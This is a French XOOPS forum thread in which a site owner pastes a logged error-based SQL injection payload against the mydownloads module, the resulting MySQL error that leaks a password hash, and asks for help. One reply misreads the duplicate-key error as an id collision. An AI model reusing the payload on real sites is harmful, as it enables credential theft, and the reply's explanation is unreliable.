Fork me on GitHub






Attaque - question idiote
Team FrXoops
Inscrit: 12/08/2003 14:34
De Montpellier
Messages: 204
Bonjour,

je pense que quelqu'un (des chinois, au hasard ) a trouvé que j'utilise Xoops, et une 1.3.10.

J'ai trouvé ça cet aprem dans mes logs suite à un pic de charge sur mon dédié :
118.0.195.139 - - [29/May/2016:18:48:52 +0200"GET /modules/mydownloads/singlefile.php?lid=44%20or%20(select%201%20from%20(select%20count(*)%2cconcat((concat(0x5e5e21%2c((select%20char_length((select%20concat(0x5e5e21%2cpass%2c0x215e5e)%20from%20ollie.fpc_users%20limit%20479%2c1))))%2c0x215e5e))%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 6792 "-" "BaiduSpider"


en pagaille. Un petit coup d'iptables a résolu le problème =)

Cet appel me donne :
Citation :
MySQL Query Error: SELECT fpc_mydownloads_cat.title, fpc_mydownloads_downloads.title, fpc_mydownloads_text.description FROM ( fpc_mydownloads_cat, fpc_mydownloads_text ) INNER JOIN fpc_mydownloads_downloads ON ( fpc_mydownloads_cat.cid=fpc_mydownloads_downloads.cid ) WHERE (fpc_mydownloads_downloads.lid=44 or (select 1 from (select count(*),concat(((select substr((select concat(0x5e5e21,pass,0x215e5e) from ollie.fpc_users limit 407,1),1,58))),floor(rand(0)*2))x from information_schema.tables group by x)a) AND fpc_mydownloads_text.lid=44 or (select 1 from (select count(*),concat(((select substr((select concat(0x5e5e21,pass,0x215e5e) from ollie.fpc_users limit 407,1),1,58))),floor(rand(0)*2))x from information_schema.tables group by x)a)) LIMIT 0,5
Error number:1062
Error message: Duplicate entry '^^!0d9f25661cd6a2c54c4a5634f23005c0!^^1' for key 'group_key'

Ma question est : est-ce que le duplicate entry est normal ?

Posté le : 29/05/2016 18:56
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Admin Frxoops
Inscrit: 16/05/2003 18:10
De Rhone-Alpes
Messages: 3529
Contrôle aussi le lid 44 du module mydownload sur ton site.

Posté le : 29/05/2016 21:43

Open in new window
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Team FrXoops
Inscrit: 12/08/2003 14:34
De Montpellier
Messages: 204
Rien de particulier, c'est le XP SP2 & TCP-IP limité. Rien dans les champs de particulier lors de l'édition.

Posté le : 29/05/2016 22:16
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Admin Frxoops
Inscrit: 04/03/2011 09:10
De Lot
Messages: 2610
Citation :

Ma question est : est-ce que le duplicate entry est normal ?


Le "duplicate entry" est une alerte MySQL, il interdit d'avoir plusieurs "id" identique.
Le fait que tu as ce message montre qu'il y a quelque part une faille d'injection MySQL, très dangereux, car là c'est bien tombé, l'id 44 existait déjà mais si il avait mis un id inexistant, ils auraient put faire des dégats. D'ailleurs ils peuvent en faire en supprimant des données MySQL de la même manière.

Posté le : 03/06/2016 22:56
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant




Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

21 Personne(s) en ligne (9 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 21 | Plus ...